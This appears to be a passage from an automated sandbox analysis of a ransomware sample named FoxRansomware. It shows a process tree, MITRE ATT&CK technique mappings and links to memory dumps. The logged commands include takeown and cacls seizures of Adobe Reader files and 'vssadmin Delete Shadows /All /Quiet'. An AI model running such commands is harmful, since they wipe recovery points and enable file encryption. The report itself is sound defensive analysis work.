  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""
  2⤵
  PID:964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"
    3⤵
    - Modifies file permissions
    PID:560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "MinionPro-It.otf" -nobanner
    3⤵
    PID:520
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "MinionPro-It.otf" -nobanner
      4⤵
      PID:1652
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""
  2⤵
  PID:1960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"
    3⤵
    - Modifies file permissions
    PID:1072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "ZX______.PFB" -nobanner
    3⤵
    PID:1696
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "ZX______.PFB" -nobanner
      4⤵
      PID:1616
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1368
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"
    3⤵
    - Modifies file permissions
    PID:552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "brt04.hsp" -nobanner
    3⤵
    PID:1392
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "brt04.hsp" -nobanner
      4⤵
      PID:1600
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1312
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""
  2⤵
  PID:1712
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C
    3⤵
    PID:828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"
    3⤵
    - Modifies file permissions
    PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "engphon.env" -nobanner
    3⤵
    PID:604
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "engphon.env" -nobanner
      4⤵
      PID:980
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:560
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"
    3⤵
    - Modifies file permissions
    PID:1756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "CORPCHAR.TXT" -nobanner
    3⤵
    PID:316
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "CORPCHAR.TXT" -nobanner
      4⤵
      PID:1880
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1072
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""
  2⤵
  PID:1616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C
    3⤵
    PID:1360
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"
    3⤵
    - Modifies file permissions
    PID:1876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "CP1250.TXT" -nobanner
    3⤵
    PID:800
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "CP1250.TXT" -nobanner
      4⤵
      PID:2028
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:552
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""
  2⤵
  PID:1600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C
    3⤵
    PID:1528

C:\Windows\system32\taskeng.exe
taskeng.exe {DF6BCDF9-A213-4A67-9489-9E5F98A89FA6} S-1-5-21-3846991908-3261386348-1409841751-1000:VQVVOAJK\Admin:Interactive:[1]
1⤵
PID:1924
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\iZwk4ceY.bat"
  2⤵
  PID:984
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:384

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1736

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1580-54-0x00000000754B1000-0x00000000754B3000-memory.dmp

Filesize
8KB

Download
memory/1948-61-0x00000000003A0000-0x00000000003E6000-memory.dmp

Filesize
280KB

Download
memory/1948-62-0x00000000003A0000-0x00000000003E6000-memory.dmp

Filesize
280KB

Download
memory/1948-63-0x00000000003A0000-0x00000000003E6000-memory.dmp

Filesize
280KB

Download